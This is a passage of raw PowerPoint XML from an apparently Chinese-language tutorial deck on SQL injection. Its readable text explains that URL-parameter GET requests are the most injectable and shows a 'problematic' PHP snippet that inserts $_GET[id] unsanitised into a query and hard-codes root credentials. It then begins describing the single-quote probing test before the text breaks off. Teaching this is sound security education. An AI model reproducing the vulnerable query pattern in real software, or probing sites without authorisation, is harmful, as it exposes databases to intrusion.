                    <a:pt x="443487" y="91359"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19580" y="19551"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19580" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195978" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195978" y="430935"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="165807" y="422315"/>
                    <a:pt x="138573" y="404274"/>
                    <a:pt x="118726" y="379657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96921" y="352640"/>
                    <a:pt x="84906" y="318602"/>
                    <a:pt x="84906" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84906" y="199249"/>
                    <a:pt x="153792" y="130462"/>
                    <a:pt x="238431" y="130462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323159" y="130462"/>
                    <a:pt x="391956" y="199249"/>
                    <a:pt x="391956" y="283765"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391956" y="318602"/>
                    <a:pt x="379941" y="352640"/>
                    <a:pt x="358136" y="379657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338289" y="404274"/>
                    <a:pt x="311144" y="422315"/>
                    <a:pt x="280884" y="430935"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="280884" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457282" y="587082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457282" y="110911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365879" y="110911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365879" y="19551"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="379674" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476951" y="97047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476951" y="606722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="606722"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6000077-12AC-4F64-B7B8-E9510020F34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3264358"/>
            <a:ext cx="10860114" cy="1288072"/>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通常我们关注</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ASP,JSP,CGI</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或</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PHP</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的网页，尤其是</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URL</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中携带参数的，例如</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 http://xxx/xxx.asp?id=numorstring</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。其中，参数可以是整数类型的也可以是字符串类型的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{878D388C-C13F-4F28-BD4F-04D73D2596D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028699" y="2680221"/>
            <a:ext cx="3528467"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000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>型的请求最容易被注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="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sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形: 圆角 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D35851-58D0-4FF7-9549-447109C86A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041374" y="5047824"/>
            <a:ext cx="10860114" cy="1088781"/>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我们以数字类型为例，进行以下的讲解。</a:t>
            </a:r>
          </a:p>
          <a:p>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如果下面两个方法能成功，说明存在</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注入漏洞，也就是他们对输入信息并没有做有效的筛查和处理。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24445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2" presetClass="entr" presetSubtype="8" decel="60000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="2" presetClass="entr" presetSubtype="2" decel="60000"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>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6" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>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494B26A0-9693-416A-9DE5-269EA70CC737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105936" y="837929"/>
            <a:ext cx="2646879" cy="474140"/>
            <a:chOff x="5105936" y="837929"/>
            <a:chExt cx="2646879" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD072DA-AB4D-4370-AB87-C37655F29895}"/>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A67D260-F185-4BE7-86E1-78E9EE06DB1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5105936" y="837929"/>
              <a:ext cx="2646879"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一段有问题的代码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="30" name="表格 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B285E88F-441D-4DEA-8833-9E2F345D80E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1080145685"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1964879" y="1456085"/>
          <a:ext cx="9001000" cy="5215414"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="9001000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4809167">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>php</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$con=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_connect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>("</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>localhost</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>","root","</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>lenovo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>");</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if(!$con){die(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_error</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>());}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_select_db</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>("</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>products",$con</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>);</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>="select * from category where id=$_GET[id]";</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echo $</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>."&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>br</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt;";</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$result=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_query</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>($</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>,$con);</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while($row=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_fetch_array</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>($</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>result,MYSQL_NUM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>))</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echo $row[0]." ".$row[1]." ".$row[2] ."&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>br</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&gt;";</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a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_free_result</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>($result);</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mysql_close</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>($con);</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?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="94775" marR="94775" marT="47387" marB="47387">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21094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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="1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5202512" y="837929"/>
            <a:ext cx="2453727" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727"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413713" y="837929"/>
              <a:ext cx="2031326"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“单引号”法</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32222B4-D638-466B-A071-8D53D47E4E22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460823" y="1456085"/>
            <a:ext cx="10153128" cy="961289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>参数后添加一个单引号，若存在注入点则通常会返回一个错误，例如，下列错误通常表明存在</a:t>
            </a:r>
            <a:r>
